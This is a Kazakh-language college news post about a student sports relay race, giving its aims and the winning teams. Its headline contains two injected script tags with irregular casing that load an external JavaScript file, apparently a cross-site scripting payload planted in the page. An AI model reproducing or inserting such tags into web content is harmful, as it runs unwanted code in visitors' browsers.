«БЕЛСЕНДІ ӨМІР – ЖАРҚЫН БОЛАШАҚ!» АТТЫ СПОРТТЫҚ ЭСТАФЕТАЛЫҚ ЖАРЫС<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

14.02.2025

Ағымдағы жылдың 12 ақпан күні Ж.Мусин атындағы Көкшетау жоғары қазақ педагогикалық колледжінде «Мектепке дейінгі педагогика және логопедия» кафедрасының «Білімге бастар алғашқы баспалдақ» атты апталығы аясында І курс студенттері арасында топ жетекшілерінің қатысуымен «Белсенді өмір – жарқын болашақ!» атты спорттық эстафеталық жарыс өтті. Мақсаты: студенттер арасында салауатты өмір салтын насихаттау, дене белсенділігін арттыру, командамен жұмыс істеу дағдыларын дамыту, топ жетекшімен студенттер арасында  өзара достық қарым-қатынасты нығайту. Жарыс қорытындысы бойынша  І орынды Өтепбай Досай Жұмаханұлы жетекшілік еткен И-12 тобының «Алаш» командасы, ІІ орынды Бегежан Ұлархан Нұрлыбекұлы жетекшілік жасаған ФБ-11 тобының «Оян қазақ» командасы және жүлделі ІІІ орынды Таткенова Сауле Қайратқызы жетекшілік еткен М-11 тобының «Самғау», Шайрахметова Әсел Ғалымқызының жетекшілігіндегі МД-11 тобының «Сұңқар» командалары иеленді.

Просмотров: 414


Пікір қосу



Деректерді қолтаңбаға қосу